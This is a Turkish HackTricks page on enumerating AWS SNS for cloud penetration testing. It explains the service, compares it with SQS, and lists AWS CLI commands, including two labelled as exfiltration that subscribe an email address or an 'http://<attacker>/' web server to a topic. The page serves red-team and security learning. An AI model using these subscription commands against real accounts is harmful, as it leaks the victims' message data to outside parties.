AWS - SNS Enum

Sıfırdan kahraman olmak için AWS hackleme öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

HackTricks'ı desteklemenin diğer yolları:

SNS

Amazon Simple Notification Service (Amazon SNS), tamamen yönetilen bir mesajlaşma servisi olarak tanımlanmaktadır. Hem uygulama-uygulama (A2A) hem de uygulama-kullanıcı (A2P) iletişim türlerini destekler.

A2A iletişim için temel özellikler arasında yayın/abone (pub/sub) mekanizmaları bulunmaktadır. Bu mekanizmalar, yüksek verimlilik sağlamak için kritik olan konuları tanıtır. Bu özellik, dağıtılmış sistemler, mikroservisler ve olay odaklı serverless mimarileri içeren senaryolarda oldukça avantajlıdır. Bu konuları kullanarak, yayıncı sistemler mesajları geniş bir abone sistem yelpazesine etkin bir şekilde dağıtabilir, fanout mesajlaşma desenini kolaylaştırır.

SQS ile Farkı

SQS, kuyruk tabanlı bir servistir ve noktadan-noktaya iletişime izin vererek mesajların tek bir tüketici tarafından işlenmesini sağlar. En az bir kez teslimat sunar, standart ve FIFO kuyrukları destekler ve mesajların yeniden deneme ve gecikmeli işleme için saklanmasına izin verir. Öte yandan, SNS bir yayın/abone tabanlı servistir ve birçok kişiye iletişimi sağlayarak mesajları çoklu abonelere aynı anda yayınlar. E-posta, SMS, Lambda fonksiyonları ve HTTP/HTTPS gibi çeşitli abonelik uç noktalarını destekler ve hedeflenen mesaj iletimi için filtreleme mekanizmaları sağlar. Her iki servis de dağıtılmış sistemlerde bileşenler arasındaki bağı koparmayı sağlarken, SQS kuyruk tabanlı iletişime odaklanırken, SNS olay odaklı, fanout iletişim desenlerine vurgu yapar.

Numaralandırma

# Get topics & subscriptions
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>

# Check privescs & post-exploitation
aws sns publish --region <region> \
--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
--message file://message.txt

# Exfiltrate through email
## You will receive an email to confirm the subscription
aws sns subscribe --region <region> \
--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
--protocol email \
--notification-endpoint my-email@example.com

# Exfiltrate through web server
## You will receive an initial request with a URL in the field "SubscribeURL"
## that you need to access to confirm the subscription
aws sns subscribe --region <region>\
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>

Not: Eğer konu FIFO türünde ise, yalnızca SQS protokolünü kullanan aboneler kullanılabilir (HTTP veya HTTPS kullanılamaz).

Ayrıca, --topic-arn içinde bölge bulunsa bile doğru bölgeyi --region içinde belirttiğinizden emin olun, aksi takdirde erişiminiz olmadığına dair bir hata alırsınız ancak sorun bölgededir.

Kimlik Doğrulamasız Erişim

AWS - SNS Unauthenticated Enum

Yetki Yükseltme

AWS - SNS Privesc

Saldırı Sonrası

AWS - SNS Post Exploitation

Kalıcılık

AWS - SNS Persistence

Referanslar

Sıfırdan kahraman olana kadar AWS hacklemeyi öğrenin htARTE (HackTricks AWS Red Team Expert)!

HackTricks'i desteklemenin diğer yolları:

Last updated